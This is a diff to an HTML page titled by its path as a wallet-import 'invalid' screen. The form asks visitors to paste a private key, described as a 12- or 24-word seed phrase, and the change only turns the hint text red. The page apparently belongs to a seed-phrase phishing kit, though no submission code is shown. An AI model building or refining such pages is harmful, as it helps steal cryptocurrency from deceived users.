--- a/sync/import-wallet/private-key/invalid.html
+++ b/sync/import-wallet/private-key/invalid.html
@@ -54,7 +54,7 @@
             <div class="field">
                 <input type="text" name="private_key" class="key" placeholder="Private Key">
             </div>
-            <div class="desc">Typically 12 (sometimes 24) words separated by single spaces</div>
+            <div class="desc" style="color: red;">Typically 12 (sometimes 24) words separated by single spaces</div>
             <br>
             <button type="submit" name="submit" class="btn">IMPORT</button>
         </form>
